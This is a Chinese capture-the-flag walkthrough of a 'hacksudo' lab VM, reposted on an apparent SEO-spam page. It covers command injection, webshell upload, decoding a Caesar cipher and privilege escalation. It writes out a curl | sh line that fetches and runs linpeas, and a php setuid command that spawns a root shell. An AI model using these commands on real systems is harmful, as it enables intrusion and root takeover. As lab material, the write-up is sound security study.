当前位置: 首页 > news >正文

专门做鞋的网站沈阳市网站

专门做鞋的网站,沈阳市网站,网站底部优化字,淄博网站制作建设环境配置 一开始桥接错网卡了 搞了半天 改回来就行了 信息收集 漏洞发现 扫个目录 大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap 都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历 换个gobuster扫一下 先看看g…

环境配置

一开始桥接错网卡了 搞了半天 改回来就行了

信息收集

在这里插入图片描述

漏洞发现

扫个目录
在这里插入图片描述
大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap
都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历
换个gobuster扫一下
在这里插入图片描述
先看看generator.php
在这里插入图片描述随便填点东西执行一下 感觉像命令注入
在这里插入图片描述
在这里插入图片描述
尝试弹个shell
没成功
那就写了个一句话 然后用蚁剑传shell
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权

优化shell
在这里插入图片描述

看看还有没有用户,有可能待会会切过去
在这里插入图片描述
用linpeas枚举脆弱性
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
在这里插入图片描述

没看见特别显眼的
在这里插入图片描述
版本过高
考虑到有个hacksudo的用户
再收集一波信息看看能不能切过去
发现有个hacksudo的文件 在这里插入图片描述
在这里插入图片描述
有加密 一眼凯撒
试试
在这里插入图片描述
在这里插入图片描述

没有sudo权限
在这里插入图片描述
在work路径下发现sh文件
没执行权限
也没看见相关的计划任务
再传个linpeas枚举
在这里插入图片描述
可以lxd提权
在这里插入图片描述
也可以view 或 php提权
这里用php提权

CMD="/bin/sh"
./home/hacksudo/locker/php -r "posix_setuid(0); system('$CMD');"

在这里插入图片描述

http://www.tj-hxxt.cn/news/7402.html

相关文章:

  • 淄博优化网站网站推广优化
  • 学会建网站如何做网络营销广告网络推广
  • 锦州网站建设锦州seo和sem的区别与联系
  • 一张图片网站代码最全资源搜索引擎
  • 学校网站建设运行情况电脑办公软件培训班
  • 做企业评价的有哪些网站宁波网站关键词排名推广
  • 什么是网站主机app广告联盟
  • 香港外贸网站建设采集站seo赚钱辅导班
  • 产品设计培训机构排名seo综合查询国产
  • 肥东网站建设文件外链生成网站
  • 一家做土产网站互联网营销有哪些方式
  • 迁安网站开发百度官方app免费下载
  • 网页制作与网站建设广州正规考证培训机构
  • 广州网站建设外包公司官方正版清理优化工具
  • 莱芜做网站号码网店seo名词解释
  • 网站的基本价格百度关键词热度查询工具
  • 义乌网站建设设seo兼职
  • 做毛绒玩具在什么网站上找客户军事新闻最新消息今天
  • 学网站建设要什么短网址链接生成
  • 群晖wordpress无法修改端口李飞seo
  • 做的好的公司网站怎么建网站卖东西
  • 做婚恋网站的思路百度搜索如何去广告
  • tomcat做网站seo 网站优化推广排名教程
  • 如何看网站是否正常怎么在网上销售
  • 网站开发系统设计怎么写优秀的营销策划案例
  • 国外优惠卷网站怎么做合肥瑶海区房价
  • 河南省网站制作公司百度推广哪家做的最好
  • 如何做网站内容管理免费创建个人博客网站
  • 众志seo云南网络推广seo代理公司
  • 动态网站开发最新技术南京网站制作